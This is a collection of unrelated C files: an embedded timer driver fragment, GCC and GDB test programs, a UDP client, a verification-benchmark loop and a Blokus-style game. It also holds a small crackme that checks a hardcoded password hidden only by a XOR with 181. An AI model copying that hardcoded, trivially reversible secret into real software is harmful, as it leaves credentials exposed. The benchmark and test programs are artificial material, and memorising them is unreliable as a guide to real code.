lp_ticker_disable_interrupt();
}
uint32_t lp_ticker_read(void)
{
return rtc_read_lp();
}
void lp_ticker_set_interrupt(timestamp_t timestamp)
{
rtc_set_wake_up_timer(timestamp);
}
void lp_ticker_fire_interrupt(void)
{
rtc_fire_interrupt();
}
void lp_ticker_disable_interrupt(void)
{
rtc_deactivate_wake_up_timer();
}
void lp_ticker_clear_interrupt(void)
{
lp_ticker_disable_interrupt();
}
void lp_ticker_free(void)
{
lp_ticker_disable_interrupt();
}
#endif /* MBED_CONF_TARGET_LPTICKER_LPTIM */
#endif /* DEVICE_LPTICKER */
|
the_stack_data/86075302.c | /* { dg-do compile } */
/* { dg-options "-mabi=o64" } */
/* { dg-skip-if "code quality test" { *-*-* } { "-O0" } { "" } } */
/* { dg-final { scan-assembler "\tslt\t" } } */
/* { dg-final { scan-assembler "\tsltu\t\|\txor\t\|\txori\t" } } */
/* This test should work both in mips16 and non-mips16 mode. */
int
f (long long a, long long b)
{
return a > 5;
}
|
the_stack_data/108375.c | #include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#define ip_addr "127.0.0.1"
#define message_len 256
#define socket_port 21567
void handle_error(char* error)
{
fprintf(stderr, "%s\n", error);
exit(-1);
}
int main(void)
{
struct sockaddr_in server_sockaddr;
int sock_desc;
char buf[message_len];
if ((sock_desc = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
{
handle_error("Error socket()\n");
}
memset((char*)&server_sockaddr, 0, sizeof(server_sockaddr));
server_sockaddr.sin_family = AF_INET;
server_sockaddr.sin_port = htons(socket_port);
server_sockaddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
printf("Please, enter a message: \n");
fgets(buf, message_len, stdin);
if (sendto(sock_desc, buf, message_len, 0, &server_sockaddr, sizeof(server_sockaddr)) < 0)
{
handle_error("Error sendto()\n");
close(sock_desc);
}
close(sock_desc);
return 0;
} |
the_stack_data/61075986.c | #include <stdlib.h>
void barrier(volatile int *cnt, int max) { // ❶
__sync_fetch_and_add(cnt, 1); // ❷
while (*cnt < max); // ❸
}
|
the_stack_data/27182.c | /* Unwinder test program.
Copyright 2006-2021 Free Software Foundation, Inc.
This file is part of GDB.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>. */
#ifdef SYMBOL_PREFIX
#define SYMBOL(str) SYMBOL_PREFIX #str
#else
#define SYMBOL(str) #str
#endif
void gdb2029 (void);
void optimized_1 (void);
int
main (void)
{
gdb2029 ();
optimized_1 ();
return 0;
}
void
optimized_1_marker (void)
{
}
void
gdb2029_marker (void)
{
}
/* A typical PIC prologue from GCC. */
asm(".text\n"
" .p2align 3\n"
SYMBOL (gdb2029) ":\n"
" stwu %r1, -32(%r1)\n"
" mflr %r0\n"
" bcl- 20,31,.+4\n"
" stw %r30, 24(%r1)\n"
" mflr %r30\n"
" stw %r0, 36(%r1)\n"
" bl gdb2029_marker\n"
" lwz %r0, 36(%r1)\n"
" lwz %r30, 24(%r1)\n"
" mtlr %r0\n"
" addi %r1, %r1, 32\n"
" blr");
/* A heavily scheduled prologue. */
asm(".text\n"
" .p2align 3\n"
SYMBOL (optimized_1) ":\n"
" stwu %r1,-32(%r1)\n"
" lis %r9,-16342\n"
" lis %r11,-16342\n"
" mflr %r0\n"
" addi %r11,%r11,3776\n"
" stmw %r27,12(%r1)\n"
" addi %r31,%r9,3152\n"
" cmplw %cr7,%r31,%r11\n"
" stw %r0,36(%r1)\n"
" mr %r30,%r3\n"
" bl optimized_1_marker\n"
" lwz %r0,36(%r1)\n"
" lmw %r27,12(%r1)\n"
" addi %r1,%r1,32\n"
" blr");
|
the_stack_data/25137118.c | extern float __VERIFIER_nondet_float(void);
extern int __VERIFIER_nondet_int(void);
typedef enum {false, true} bool;
bool __VERIFIER_nondet_bool(void) {
return __VERIFIER_nondet_int() != 0;
}
int main()
{
float x_10, _x_x_10;
bool _J549, _x__J549;
bool _J536, _x__J536;
float x_5, _x_x_5;
bool _EL_X_508, _x__EL_X_508;
float x_3, _x_x_3;
bool _EL_U_521, _x__EL_U_521;
bool _EL_U_519, _x__EL_U_519;
float x_4, _x_x_4;
float x_11, _x_x_11;
float x_0, _x_x_0;
float x_7, _x_x_7;
float x_2, _x_x_2;
float x_6, _x_x_6;
float x_9, _x_x_9;
float x_8, _x_x_8;
float x_1, _x_x_1;
int __steps_to_fair = __VERIFIER_nondet_int();
x_10 = __VERIFIER_nondet_float();
_J549 = __VERIFIER_nondet_bool();
_J536 = __VERIFIER_nondet_bool();
x_5 = __VERIFIER_nondet_float();
_EL_X_508 = __VERIFIER_nondet_bool();
x_3 = __VERIFIER_nondet_float();
_EL_U_521 = __VERIFIER_nondet_bool();
_EL_U_519 = __VERIFIER_nondet_bool();
x_4 = __VERIFIER_nondet_float();
x_11 = __VERIFIER_nondet_float();
x_0 = __VERIFIER_nondet_float();
x_7 = __VERIFIER_nondet_float();
x_2 = __VERIFIER_nondet_float();
x_6 = __VERIFIER_nondet_float();
x_9 = __VERIFIER_nondet_float();
x_8 = __VERIFIER_nondet_float();
x_1 = __VERIFIER_nondet_float();
bool __ok = (1 && (((( !(((x_0 + (-1.0 * x_11)) <= -4.0) || _EL_U_519)) || (_EL_U_521 && ( !_EL_X_508))) && ( !_J536)) && ( !_J549)));
while (__steps_to_fair >= 0 && __ok) {
if ((_J536 && _J549)) {
__steps_to_fair = __VERIFIER_nondet_int();
} else {
__steps_to_fair--;
}
_x_x_10 = __VERIFIER_nondet_float();
_x__J549 = __VERIFIER_nondet_bool();
_x__J536 = __VERIFIER_nondet_bool();
_x_x_5 = __VERIFIER_nondet_float();
_x__EL_X_508 = __VERIFIER_nondet_bool();
_x_x_3 = __VERIFIER_nondet_float();
_x__EL_U_521 = __VERIFIER_nondet_bool();
_x__EL_U_519 = __VERIFIER_nondet_bool();
_x_x_4 = __VERIFIER_nondet_float();
_x_x_11 = __VERIFIER_nondet_float();
_x_x_0 = __VERIFIER_nondet_float();
_x_x_7 = __VERIFIER_nondet_float();
_x_x_2 = __VERIFIER_nondet_float();
_x_x_6 = __VERIFIER_nondet_float();
_x_x_9 = __VERIFIER_nondet_float();
_x_x_8 = __VERIFIER_nondet_float();
_x_x_1 = __VERIFIER_nondet_float();
__ok = ((((((((((((((((x_9 + (-1.0 * _x_x_0)) <= -5.0) && (((x_8 + (-1.0 * _x_x_0)) <= -2.0) && (((x_7 + (-1.0 * _x_x_0)) <= -19.0) && (((x_6 + (-1.0 * _x_x_0)) <= -18.0) && (((x_4 + (-1.0 * _x_x_0)) <= -17.0) && ((x_5 + (-1.0 * _x_x_0)) <= -17.0)))))) && (((x_9 + (-1.0 * _x_x_0)) == -5.0) || (((x_8 + (-1.0 * _x_x_0)) == -2.0) || (((x_7 + (-1.0 * _x_x_0)) == -19.0) || (((x_6 + (-1.0 * _x_x_0)) == -18.0) || (((x_4 + (-1.0 * _x_x_0)) == -17.0) || ((x_5 + (-1.0 * _x_x_0)) == -17.0))))))) && ((((x_9 + (-1.0 * _x_x_1)) <= -2.0) && (((x_8 + (-1.0 * _x_x_1)) <= -4.0) && (((x_7 + (-1.0 * _x_x_1)) <= -2.0) && (((x_5 + (-1.0 * _x_x_1)) <= -8.0) && (((x_2 + (-1.0 * _x_x_1)) <= -18.0) && ((x_3 + (-1.0 * _x_x_1)) <= -6.0)))))) && (((x_9 + (-1.0 * _x_x_1)) == -2.0) || (((x_8 + (-1.0 * _x_x_1)) == -4.0) || (((x_7 + (-1.0 * _x_x_1)) == -2.0) || (((x_5 + (-1.0 * _x_x_1)) == -8.0) || (((x_2 + (-1.0 * _x_x_1)) == -18.0) || ((x_3 + (-1.0 * _x_x_1)) == -6.0)))))))) && ((((x_9 + (-1.0 * _x_x_2)) <= -6.0) && (((x_8 + (-1.0 * _x_x_2)) <= -15.0) && (((x_7 + (-1.0 * _x_x_2)) <= -14.0) && (((x_5 + (-1.0 * _x_x_2)) <= -14.0) && (((x_0 + (-1.0 * _x_x_2)) <= -18.0) && ((x_1 + (-1.0 * _x_x_2)) <= -4.0)))))) && (((x_9 + (-1.0 * _x_x_2)) == -6.0) || (((x_8 + (-1.0 * _x_x_2)) == -15.0) || (((x_7 + (-1.0 * _x_x_2)) == -14.0) || (((x_5 + (-1.0 * _x_x_2)) == -14.0) || (((x_0 + (-1.0 * _x_x_2)) == -18.0) || ((x_1 + (-1.0 * _x_x_2)) == -4.0)))))))) && ((((x_9 + (-1.0 * _x_x_3)) <= -5.0) && (((x_6 + (-1.0 * _x_x_3)) <= -2.0) && (((x_5 + (-1.0 * _x_x_3)) <= -16.0) && (((x_3 + (-1.0 * _x_x_3)) <= -6.0) && (((x_0 + (-1.0 * _x_x_3)) <= -1.0) && ((x_1 + (-1.0 * _x_x_3)) <= -4.0)))))) && (((x_9 + (-1.0 * _x_x_3)) == -5.0) || (((x_6 + (-1.0 * _x_x_3)) == -2.0) || (((x_5 + (-1.0 * _x_x_3)) == -16.0) || (((x_3 + (-1.0 * _x_x_3)) == -6.0) || (((x_0 + (-1.0 * _x_x_3)) == -1.0) || ((x_1 + (-1.0 * _x_x_3)) == -4.0)))))))) && ((((x_10 + (-1.0 * _x_x_4)) <= -13.0) && (((x_9 + (-1.0 * _x_x_4)) <= -6.0) && (((x_8 + (-1.0 * _x_x_4)) <= -12.0) && (((x_5 + (-1.0 * _x_x_4)) <= -4.0) && (((x_1 + (-1.0 * _x_x_4)) <= -8.0) && ((x_2 + (-1.0 * _x_x_4)) <= -7.0)))))) && (((x_10 + (-1.0 * _x_x_4)) == -13.0) || (((x_9 + (-1.0 * _x_x_4)) == -6.0) || (((x_8 + (-1.0 * _x_x_4)) == -12.0) || (((x_5 + (-1.0 * _x_x_4)) == -4.0) || (((x_1 + (-1.0 * _x_x_4)) == -8.0) || ((x_2 + (-1.0 * _x_x_4)) == -7.0)))))))) && ((((x_10 + (-1.0 * _x_x_5)) <= -5.0) && (((x_9 + (-1.0 * _x_x_5)) <= -17.0) && (((x_7 + (-1.0 * _x_x_5)) <= -19.0) && (((x_6 + (-1.0 * _x_x_5)) <= -18.0) && (((x_4 + (-1.0 * _x_x_5)) <= -11.0) && ((x_5 + (-1.0 * _x_x_5)) <= -2.0)))))) && (((x_10 + (-1.0 * _x_x_5)) == -5.0) || (((x_9 + (-1.0 * _x_x_5)) == -17.0) || (((x_7 + (-1.0 * _x_x_5)) == -19.0) || (((x_6 + (-1.0 * _x_x_5)) == -18.0) || (((x_4 + (-1.0 * _x_x_5)) == -11.0) || ((x_5 + (-1.0 * _x_x_5)) == -2.0)))))))) && ((((x_11 + (-1.0 * _x_x_6)) <= -20.0) && (((x_10 + (-1.0 * _x_x_6)) <= -12.0) && (((x_7 + (-1.0 * _x_x_6)) <= -3.0) && (((x_3 + (-1.0 * _x_x_6)) <= -9.0) && (((x_0 + (-1.0 * _x_x_6)) <= -2.0) && ((x_2 + (-1.0 * _x_x_6)) <= -18.0)))))) && (((x_11 + (-1.0 * _x_x_6)) == -20.0) || (((x_10 + (-1.0 * _x_x_6)) == -12.0) || (((x_7 + (-1.0 * _x_x_6)) == -3.0) || (((x_3 + (-1.0 * _x_x_6)) == -9.0) || (((x_0 + (-1.0 * _x_x_6)) == -2.0) || ((x_2 + (-1.0 * _x_x_6)) == -18.0)))))))) && ((((x_11 + (-1.0 * _x_x_7)) <= -9.0) && (((x_8 + (-1.0 * _x_x_7)) <= -13.0) && (((x_5 + (-1.0 * _x_x_7)) <= -9.0) && (((x_4 + (-1.0 * _x_x_7)) <= -13.0) && (((x_1 + (-1.0 * _x_x_7)) <= -6.0) && ((x_3 + (-1.0 * _x_x_7)) <= -16.0)))))) && (((x_11 + (-1.0 * _x_x_7)) == -9.0) || (((x_8 + (-1.0 * _x_x_7)) == -13.0) || (((x_5 + (-1.0 * _x_x_7)) == -9.0) || (((x_4 + (-1.0 * _x_x_7)) == -13.0) || (((x_1 + (-1.0 * _x_x_7)) == -6.0) || ((x_3 + (-1.0 * _x_x_7)) == -16.0)))))))) && ((((x_11 + (-1.0 * _x_x_8)) <= -14.0) && (((x_9 + (-1.0 * _x_x_8)) <= -19.0) && (((x_6 + (-1.0 * _x_x_8)) <= -3.0) && (((x_3 + (-1.0 * _x_x_8)) <= -16.0) && (((x_0 + (-1.0 * _x_x_8)) <= -17.0) && ((x_2 + (-1.0 * _x_x_8)) <= -11.0)))))) && (((x_11 + (-1.0 * _x_x_8)) == -14.0) || (((x_9 + (-1.0 * _x_x_8)) == -19.0) || (((x_6 + (-1.0 * _x_x_8)) == -3.0) || (((x_3 + (-1.0 * _x_x_8)) == -16.0) || (((x_0 + (-1.0 * _x_x_8)) == -17.0) || ((x_2 + (-1.0 * _x_x_8)) == -11.0)))))))) && ((((x_10 + (-1.0 * _x_x_9)) <= -19.0) && (((x_9 + (-1.0 * _x_x_9)) <= -2.0) && (((x_8 + (-1.0 * _x_x_9)) <= -6.0) && (((x_4 + (-1.0 * _x_x_9)) <= -14.0) && (((x_1 + (-1.0 * _x_x_9)) <= -5.0) && ((x_2 + (-1.0 * _x_x_9)) <= -19.0)))))) && (((x_10 + (-1.0 * _x_x_9)) == -19.0) || (((x_9 + (-1.0 * _x_x_9)) == -2.0) || (((x_8 + (-1.0 * _x_x_9)) == -6.0) || (((x_4 + (-1.0 * _x_x_9)) == -14.0) || (((x_1 + (-1.0 * _x_x_9)) == -5.0) || ((x_2 + (-1.0 * _x_x_9)) == -19.0)))))))) && ((((x_10 + (-1.0 * _x_x_10)) <= -7.0) && (((x_8 + (-1.0 * _x_x_10)) <= -1.0) && (((x_6 + (-1.0 * _x_x_10)) <= -19.0) && (((x_4 + (-1.0 * _x_x_10)) <= -4.0) && (((x_0 + (-1.0 * _x_x_10)) <= -15.0) && ((x_1 + (-1.0 * _x_x_10)) <= -17.0)))))) && (((x_10 + (-1.0 * _x_x_10)) == -7.0) || (((x_8 + (-1.0 * _x_x_10)) == -1.0) || (((x_6 + (-1.0 * _x_x_10)) == -19.0) || (((x_4 + (-1.0 * _x_x_10)) == -4.0) || (((x_0 + (-1.0 * _x_x_10)) == -15.0) || ((x_1 + (-1.0 * _x_x_10)) == -17.0)))))))) && ((((x_9 + (-1.0 * _x_x_11)) <= -8.0) && (((x_7 + (-1.0 * _x_x_11)) <= -11.0) && (((x_4 + (-1.0 * _x_x_11)) <= -5.0) && (((x_3 + (-1.0 * _x_x_11)) <= -3.0) && (((x_0 + (-1.0 * _x_x_11)) <= -15.0) && ((x_1 + (-1.0 * _x_x_11)) <= -15.0)))))) && (((x_9 + (-1.0 * _x_x_11)) == -8.0) || (((x_7 + (-1.0 * _x_x_11)) == -11.0) || (((x_4 + (-1.0 * _x_x_11)) == -5.0) || (((x_3 + (-1.0 * _x_x_11)) == -3.0) || (((x_0 + (-1.0 * _x_x_11)) == -15.0) || ((x_1 + (-1.0 * _x_x_11)) == -15.0)))))))) && ((((_EL_U_521 == ((_x__EL_U_521 && ( !_x__EL_X_508)) || ( !(_x__EL_U_519 || ((_x_x_0 + (-1.0 * _x_x_11)) <= -4.0))))) && ((_EL_U_519 == (_x__EL_U_519 || ((_x_x_0 + (-1.0 * _x_x_11)) <= -4.0))) && (_EL_X_508 == ((_x_x_4 + (-1.0 * _x_x_7)) <= 6.0)))) && (_x__J536 == (( !(_J536 && _J549)) && ((_J536 && _J549) || ((((x_0 + (-1.0 * x_11)) <= -4.0) || ( !(((x_0 + (-1.0 * x_11)) <= -4.0) || _EL_U_519))) || _J536))))) && (_x__J549 == (( !(_J536 && _J549)) && ((_J536 && _J549) || ((( !(((x_0 + (-1.0 * x_11)) <= -4.0) || _EL_U_519)) || ( !(( !(((x_0 + (-1.0 * x_11)) <= -4.0) || _EL_U_519)) || (_EL_U_521 && ( !_EL_X_508))))) || _J549))))));
x_10 = _x_x_10;
_J549 = _x__J549;
_J536 = _x__J536;
x_5 = _x_x_5;
_EL_X_508 = _x__EL_X_508;
x_3 = _x_x_3;
_EL_U_521 = _x__EL_U_521;
_EL_U_519 = _x__EL_U_519;
x_4 = _x_x_4;
x_11 = _x_x_11;
x_0 = _x_x_0;
x_7 = _x_x_7;
x_2 = _x_x_2;
x_6 = _x_x_6;
x_9 = _x_x_9;
x_8 = _x_x_8;
x_1 = _x_x_1;
}
}
|
the_stack_data/100140182.c | #include <stdio.h>
#include <string.h>
#include <stdbool.h>
void decStr(char* str) {
int len = strlen(str);
for (int i=0; i<len; i++) {
str[i] ^= 181;
}
}
bool testPassword(char* attempt) {
if (strlen(attempt) != 8)
return false;
char password[] = {197, 212, 198, 198, 194, 218, 199, 209};
decStr(attempt);
for (int i=0; i < 8; i++) {
if (attempt[i] != password[i])
return false;
}
return true;
}
int main(int argc, char** argv) {
printf("Enter password: ");
fflush(stdout);
char buff[200];
fgets(buff, sizeof(buff), stdin); // get input
buff[strlen(buff) - 1] = '\0'; // remove the newline
if (testPassword(buff)) {
puts("You win!");
}
else {
puts("You fail");
}
}
|
the_stack_data/61937.c | #include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<stdbool.h>
#define ROW 14
#define COLUMN 14
#define PUZNUM 21
#define PUZRC 5
typedef const char* String;
bool firstplace(char Board[ROW][COLUMN][20]){
if((strcmp(Board[4][4], "N") == 0)|| (strcmp(Board[9][9], "N") == 0)){
return true;
}
else{
return false;
}
}
void rotate(char (*puzzle)[PUZRC][PUZRC][20]){
int i, j;
char puztemp[PUZRC][PUZRC][20];
for(i = 0; i < 5 ; i++){
for(j = 0; j < 5; j++){
strcpy(puztemp[i][j], (*puzzle)[4-j][i]);
}
}
for( i = 0; i < 5; i++){
for( j = 0; j < 5; j++){
strcpy((*puzzle)[i][j], puztemp[i][j]);
}
}
}
void construct(char puzzle[PUZNUM][PUZRC][PUZRC][20], String color){
int i, j ,k;
for(i = 0; i < 21; i++){
for(j = 0; j < 5; j++){
for(k = 0; k < 5;k++){
strcpy(puzzle[i][j][k] ,"N");
}
}
}
strcpy(puzzle[0][0][0] , color);
strcpy(puzzle[1][0][0] , color);
strcpy(puzzle[1][0][1] , color);
strcpy(puzzle[2][0][0] , color);
strcpy(puzzle[2][0][1] , color);
strcpy(puzzle[2][1][1] , color);
strcpy(puzzle[3][0][0] , color);
strcpy(puzzle[3][0][1] , color);
strcpy(puzzle[3][0][2] , color);
strcpy(puzzle[4][0][0] , color);
strcpy(puzzle[4][0][1] , color);
strcpy(puzzle[4][1][0] , color);
strcpy(puzzle[4][1][1] , color);
strcpy(puzzle[5][0][0] , color);
strcpy(puzzle[5][0][1] , color);
strcpy(puzzle[5][0][2] , color);
strcpy(puzzle[5][1][0] , color);
strcpy(puzzle[6][0][0] , color);
strcpy(puzzle[6][0][1] , color);
strcpy(puzzle[6][0][2] , color);
strcpy(puzzle[6][1][1] , color);
strcpy(puzzle[7][0][0] , color);
strcpy(puzzle[7][0][1] , color);
strcpy(puzzle[7][1][1] , color);
strcpy(puzzle[7][1][2] , color);
strcpy(puzzle[8][0][0] , color);
strcpy(puzzle[8][0][1] , color);
strcpy(puzzle[8][0][2] , color);
strcpy(puzzle[8][0][3] , color);
strcpy(puzzle[9][0][0] , color);
strcpy(puzzle[9][0][1] , color);
strcpy(puzzle[9][0][2] , color);
strcpy(puzzle[9][1][0] , color);
strcpy(puzzle[9][1][1] , color);
strcpy(puzzle[10][0][0] , color);
strcpy(puzzle[10][0][1] , color);
strcpy(puzzle[10][0][2] , color);
strcpy(puzzle[10][1][0] , color);
strcpy(puzzle[10][1][2] , color);
strcpy(puzzle[11][0][0] , color);
strcpy(puzzle[11][0][1] , color);
strcpy(puzzle[11][0][2] , color);
strcpy(puzzle[11][1][1] , color);
strcpy(puzzle[11][2][1] , color);
strcpy(puzzle[12][0][0] , color);
strcpy(puzzle[12][0][1] , color);
strcpy(puzzle[12][0][2] , color);
strcpy(puzzle[12][1][0] , color);
strcpy(puzzle[12][2][0] , color);
strcpy(puzzle[13][0][0] , color);
strcpy(puzzle[13][0][1] , color);
strcpy(puzzle[13][1][1] , color);
strcpy(puzzle[13][1][2] , color);
strcpy(puzzle[13][2][2] , color);
strcpy(puzzle[14][0][0] , color);
strcpy(puzzle[14][1][0] , color);
strcpy(puzzle[14][1][1] , color);
strcpy(puzzle[14][1][2] , color);
strcpy(puzzle[14][2][2] , color);
strcpy(puzzle[15][0][0] , color);
strcpy(puzzle[15][1][0] , color);
strcpy(puzzle[15][1][1] , color);
strcpy(puzzle[15][1][2] , color);
strcpy(puzzle[15][2][1] , color);
strcpy(puzzle[16][0][1] , color);
strcpy(puzzle[16][1][0] , color);
strcpy(puzzle[16][1][1] , color);
strcpy(puzzle[16][1][2] , color);
strcpy(puzzle[16][2][1] , color);
strcpy(puzzle[17][0][0] , color);
strcpy(puzzle[17][0][1] , color);
strcpy(puzzle[17][0][2] , color);
strcpy(puzzle[17][0][3] , color);
strcpy(puzzle[17][1][0] , color);
strcpy(puzzle[18][0][0] , color);
strcpy(puzzle[18][0][1] , color);
strcpy(puzzle[18][0][2] , color);
strcpy(puzzle[18][1][2] , color);
strcpy(puzzle[18][1][3] , color);
strcpy(puzzle[19][0][0] , color);
strcpy(puzzle[19][0][1] , color);
strcpy(puzzle[19][0][2] , color);
strcpy(puzzle[19][0][3] , color);
strcpy(puzzle[19][1][1] , color);
strcpy(puzzle[20][0][0] , color);
strcpy(puzzle[20][0][1] , color);
strcpy(puzzle[20][0][2] , color);
strcpy(puzzle[20][0][3] , color);
strcpy(puzzle[20][0][4] , color);
}
void flip(char (*puzzle)[PUZRC][PUZRC][20]){
int i, j;
char puztemp[PUZRC][PUZRC][20];
for(i = 0; i < 5; i++){
for(j = 0; j < 5; j++){
strcpy(puztemp[i][j], (*puzzle)[4-i][j]);
}
}
for(i = 0; i < 5; i++){
for(j = 0; j < 5; j++){
strcpy((*puzzle)[i][j], puztemp[i][j]);
}
}
}
void ini_end(char (*puzzle)[PUZRC][PUZRC][20], int *ini_r, int *ini_c, int *end_r, int *end_c, String color){
int i, j;
bool find = false;
for(i = 0; i < 5; i++){
for(j = 0; j < 5; j++){
if(strcmp((*puzzle)[i][j], color) == 0){
*ini_r = i;
find = true;
break;
}
}
if(find){
break;
}
}
find = false;
for(j = 0; j < 5; j++){
for(i = 0; i < 5; i++){
if(strcmp((*puzzle)[i][j], color) == 0){
*ini_c = j;
find = true;
break;
}
}
if(find){
break;
}
}
find = false;
for(i = 4; i >= 0; i--){
for(j = 0; j < 5; j++){
if(strcmp((*puzzle)[i][j], color) == 0){
*end_r = i;
find = true;
break;
}
}
if(find){
break;
}
}
find = false;
for(j = 4; j >= 0; j--){
for(i = 0; i < 5; i++){
if(strcmp((*puzzle)[i][j], color) == 0){
*end_c = j;
find = true;
break;
}
}
if(find){
break;
}
}
}
bool placeable(char (*puzzle)[PUZRC][PUZRC][20], char Board[ROW][COLUMN][20], int k, int t, int *ini_r, int *end_r, int *ini_c, int *end_c, String color){
int i, j;
bool canplace;
bool pass1 = true;
bool pass2 = false;
bool pass3 = true;
for(i = *ini_r; i < *end_r + 1; i++){
for(j = *ini_c; j < *end_c + 1; j++){
int m = i+k-*ini_r;
int n = j+t-*ini_c;
if((m > 13) || (n > 13) || (m < 0) || (n < 0)){
pass3 = false;
break;
}
else if(strcmp((*puzzle)[i][j], color) == 0){
if(m == 0 && n == 0){
if((!(strcmp(Board[m+1][n], color) == 0)) && (!(strcmp(Board[m][n+1], color) == 0))
&& (strcmp(Board[m][n], "N") == 0)){
pass1 = pass1 & true;
}
else{
pass1 = pass1 & false;
break;
}
if(strcmp(Board[m+1][n+1], color) == 0){
pass2 = pass2 | true;
}
else{
pass2 = pass2 | false;
}
}
else if(m == 13 && n == 0){
if((!(strcmp(Board[m][n+1], color) == 0)) && (!(strcmp(Board[m-1][n], color) == 0))
&& (strcmp(Board[m][n], "N") == 0)){
pass1 = pass1 & true;
}
else{
pass1 = pass1 & false;
break;
}
if(strcmp(Board[m-1][n+1], color) == 0){
pass2 = pass2 | true;
}
else{
pass2 = pass2 | false;
}
}
else if(m == 0 && n == 13){
if((!(strcmp(Board[m+1][n], color) == 0)) && (!(strcmp(Board[m][n-1], color) == 0))
&& (strcmp(Board[m][n], "N") == 0)){
pass1 = pass1 & true;
}
else{
pass1 = pass1 & false;
break;
}
if(strcmp(Board[m+1][n-1], color) == 0){
pass2 = pass2 | true;
}
else{
pass2 = pass2 | false;
}
}
else if(m == 13 && n == 13){
if( (!(strcmp(Board[m][n-1], color) == 0)) && (!(strcmp(Board[m-1][n], color) == 0))
&& (strcmp(Board[m][n], "N") == 0)){
pass1 = pass1 & true;
}
else{
pass1 = pass1 & false;
break;
}
if(strcmp(Board[m-1][n-1], color) == 0){
pass2 = pass2 | true;
}
else{
pass2 = pass2 | false;
}
}
else if(m == 0){
if((!(strcmp(Board[m+1][n], color) == 0)) && (!(strcmp(Board[m][n+1], color) == 0))
&& (!(strcmp(Board[m][n-1], color) == 0)) && (strcmp(Board[m][n], "N") == 0)){
pass1 = pass1 & true;
}
else{
pass1 = pass1 & false;
break;
}
if((strcmp(Board[m+1][n+1], color) == 0) || (strcmp(Board[m+1][n-1], color) == 0) ){
pass2 = pass2 | true;
}
else{
pass2 = pass2 | false;
}
}
else if(m == 13){
if((!(strcmp(Board[m][n+1], color) == 0)) && (!(strcmp(Board[m][n-1], color) == 0))
&& (!(strcmp(Board[m-1][n], color) == 0)) && (strcmp(Board[m][n], "N") == 0)){
pass1 = pass1 & true;
}
else{
pass1 = pass1 & false;
break;
}
if((strcmp(Board[m-1][n-1], color) == 0) || (strcmp(Board[m-1][n+1], color) == 0)){
pass2 = pass2 | true;
}
else{
pass2 = pass2 | false;
}
}
else if(n == 0){
if((!(strcmp(Board[m+1][n], color) == 0)) && (!(strcmp(Board[m][n+1], color) == 0))
&& (!(strcmp(Board[m-1][n], color) == 0)) && (strcmp(Board[m][n], "N") == 0)){
pass1 = pass1 & true;
}
else{
pass1 = pass1 & false;
break;
}
if((strcmp(Board[m+1][n+1], color) == 0) || (strcmp(Board[m-1][n+1], color) == 0)){
pass2 = pass2 | true;
}
else{
pass2 = pass2 | false;
}
}
else if(n == 13){
if((!(strcmp(Board[m+1][n], color) == 0)) && (!(strcmp(Board[m][n-1], color) == 0))
&& (!(strcmp(Board[m-1][n], color) == 0)) && (strcmp(Board[m][n], "N") == 0)){
pass1 = pass1 & true;
}
else{
pass1 = pass1 & false;
break;
}
if(((strcmp(Board[m-1][n-1], color) == 0) || (strcmp(Board[m+1][n-1], color) == 0))){
pass2 = pass2 | true;
}
else{
pass2 = pass2 | false;
}
}
else{
if((!(strcmp(Board[m+1][n], color) == 0)) && (!(strcmp(Board[m][n+1], color) == 0))
&& (!(strcmp(Board[m][n-1], color) == 0)) && (!(strcmp(Board[m-1][n], color) == 0))
&& (strcmp(Board[m][n], "N") == 0)){
pass1 = pass1 & true;
}
else{
pass1 = pass1 & false;
break;
}
if((strcmp(Board[m+1][n+1], color) == 0) || (strcmp(Board[m-1][n-1], color) == 0)
|| (strcmp(Board[m+1][n-1], color) == 0) || (strcmp(Board[m-1][n+1], color) == 0)){
pass2 = pass2 | true;
}
else{
pass2 = pass2 | false;
}
}
}
}
if((!pass1) || (!pass3)){
break;
}
}
canplace = pass1 & pass2 & pass3;
return canplace;
}
void findarc(char Board[ROW][COLUMN][20], int *k, int *t, int *n, String color){
int i, j;
bool isarc;
bool pass1;
bool pass2;
for(i = 0; i < 14; i++){
for(j = 0; j < 14; j++){
if(i == 0 && j == 0){
if((!(strcmp(Board[i+1][j], color) == 0)) && (!(strcmp(Board[i][j+1], color) == 0))
&& (strcmp(Board[i][j], "N") == 0)){
pass1 = true;
}
else{
pass1 = false;
}
if(strcmp(Board[i+1][j+1], color) == 0){
pass2 = true;
}
else{
pass2 = false;
}
}
else if(i == 13 && j == 0){
if((!(strcmp(Board[i][j+1], color) == 0)) && (!(strcmp(Board[i-1][j], color) == 0))
&& (strcmp(Board[i][j], "N") == 0)){
pass1 = true;
}
else{
pass1 = false;
}
if(strcmp(Board[i-1][j+1], color) == 0){
pass2 = true;
}
else{
pass2 = false;
}
}
else if(i == 0 && j == 13){
if((!(strcmp(Board[i+1][j], color) == 0)) && (!(strcmp(Board[i][j-1], color) == 0))
&& (strcmp(Board[i][j], "N") == 0)){
pass1 = true;
}
else{
pass1 = false;
}
if(strcmp(Board[i+1][j-1], color) == 0){
pass2 = true;
}
else{
pass2 = false;
}
}
else if(i == 13 && j == 13){
if( (!(strcmp(Board[i][j-1], color) == 0)) && (!(strcmp(Board[i-1][j], color) == 0))
&& (strcmp(Board[i][j], "N") == 0)){
pass1 = true;
}
else{
pass1 = false;
}
if(strcmp(Board[i-1][j-1], color) == 0){
pass2 = true;
}
else{
pass2 = false;
}
}
else if(i == 0){
if((!(strcmp(Board[i+1][j], color) == 0)) && (!(strcmp(Board[i][j+1], color) == 0))
&& (!(strcmp(Board[i][j-1], color) == 0)) && (strcmp(Board[i][j], "N") == 0)){
pass1 = true;
}
else{
pass1 = false;
}
if((strcmp(Board[i+1][j+1], color) == 0) || (strcmp(Board[i+1][j-1], color) == 0) ){
pass2 = true;
}
else{
pass2 = false;
}
}
else if(i == 13){
if((!(strcmp(Board[i][j+1], color) == 0)) && (!(strcmp(Board[i][j-1], color) == 0))
